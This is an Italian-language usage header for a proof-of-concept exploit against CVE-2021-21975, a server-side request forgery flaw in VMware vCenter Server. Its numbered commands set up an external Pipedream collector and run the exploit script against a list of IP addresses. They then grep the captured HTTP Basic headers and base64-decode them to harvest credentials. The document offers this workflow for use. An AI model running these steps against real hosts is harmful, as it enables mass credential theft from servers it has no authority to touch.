
Exploit proof-of-concept per CVE-2021-21975 (VMware vCenter Server SSRF) che sfrutta la server-side request forgery per divulgare credenziali codificate in base64 tramite autenticazione HTTP Basic.
#SSRF-POC - da ssrf a perdita di credenziali
#Prima configura il client pd.
#Ora esegui ./pd deploy http-new-requests
#Ora sostituisci la richiesta http di pipedream es: Randomstring.m.pipedream.net nello script
#Esegui questo in un terminale separato - ./pd logs new-requests | tee -a req.txt
#E ora esegui questo in un altro terminale - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Questa è una proof of concept iniziale creata quando la vulnerabilità è diventata pubblica mesi fa, quindi usala a tuo rischio." :V
#crediti @wabaf3t @D0rkerDevil